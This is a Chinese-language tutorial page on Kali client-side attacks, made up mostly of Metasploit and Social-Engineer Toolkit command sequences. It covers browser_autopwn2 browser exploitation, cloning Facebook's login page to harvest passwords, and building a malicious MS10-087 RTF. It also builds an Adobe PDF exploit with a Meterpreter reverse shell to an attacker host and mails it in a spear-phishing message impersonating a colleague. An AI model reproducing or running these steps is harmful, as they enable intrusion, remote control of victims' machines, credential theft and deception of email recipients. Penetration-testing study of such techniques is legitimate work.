首页 > 代码库 > kali客户端攻击
kali客户端攻击
浏览器攻击 browser_autpwn2 (BAP2)
mkdir /test 为接受响应的服务器创建目录
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.56.1
set URIPATH /test
#假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
set EXCLUDE_PATTERN android|adobe_flash
show advanced 查看高级选项的完整列表
set ShowExploitList true
set VERBOSE true
exploit
使目标浏览器访问http://192.168.56.1/test
窃取浏览器登录凭证:
root@bt:# service apache2 start
root@bt:# setoolkit
Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner
IP address for the POST back in Harvester/Tabnabbing: 填写本机IP
set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)
此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时,则会出现相同登录页面,若目标登录,会把密码储存在生成的harvester文件中
Office
ms10_087漏洞,执行自定义的exe文件
msf > db_status postgresql selected, no connectionmsf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.ymlmsf > search officemsf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bofmsf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/execmsf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exemsf exploit(ms10_087_rtf_pfragments_bof) > exploit [+] msf.rtf stored at /root/.msf4/local/msf.rtf
root@kali:~# cd /root/.msf4/local 生成的msf.rtf
/*************************************************************************/
MailAttack
set> 1 Social-Engineering Attacksset> 1 Spear-Phishing Attack Vectorsset:phishing>1 Perform a Mass Email Attackset:payloads>6 Adobe CoolType SING Table "uniqueName" Overflowset:payloads>2 Windows Meterpreter Reverse_TCPset:payloads> Port to connect back on [443]:All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directoryDo you want to rename the file?example Enter the new filename: moo.pdf1. Keep the filename, I don‘t care.2. Rename the file, I want to be cool.=ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E
然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。
把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上(关闭防病毒软件),打开template.pdf,修改后拷贝回原目录下,覆盖原有的template.pdf
set:phishing>2set:phishing> New filename:Dvssc_ABC_Project_Statue.pdfset:phishing>1 E-Mail Attack Single Email Addressset:phishing>2 One-Time Use Email Templateset:phishing> Subject of the email:ABC Project Statusset:phishing> Send the message as html or plain? ‘h‘ or ‘p‘ [p]:pset:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Next line of the body: Hi Wang:Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice. Next line of the body: Next line of the body: Best Regard!Next line of the body: li Ming Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.comset:phishing>2 Use your own server or open relayset:phishing> From address (ex: moo@example.com):liming@dvssc.comset:phishing> Username for open-relay [blank]:yournamePassword for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.comset:phishing> Port number for the SMTP server [25]:set:phishing> Flag this message/s as high priority? [yes|no]:yes[*] SET has finished delivering the emailsset:phishing> Setup a listener [yes|no]:yes
kali客户端攻击
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。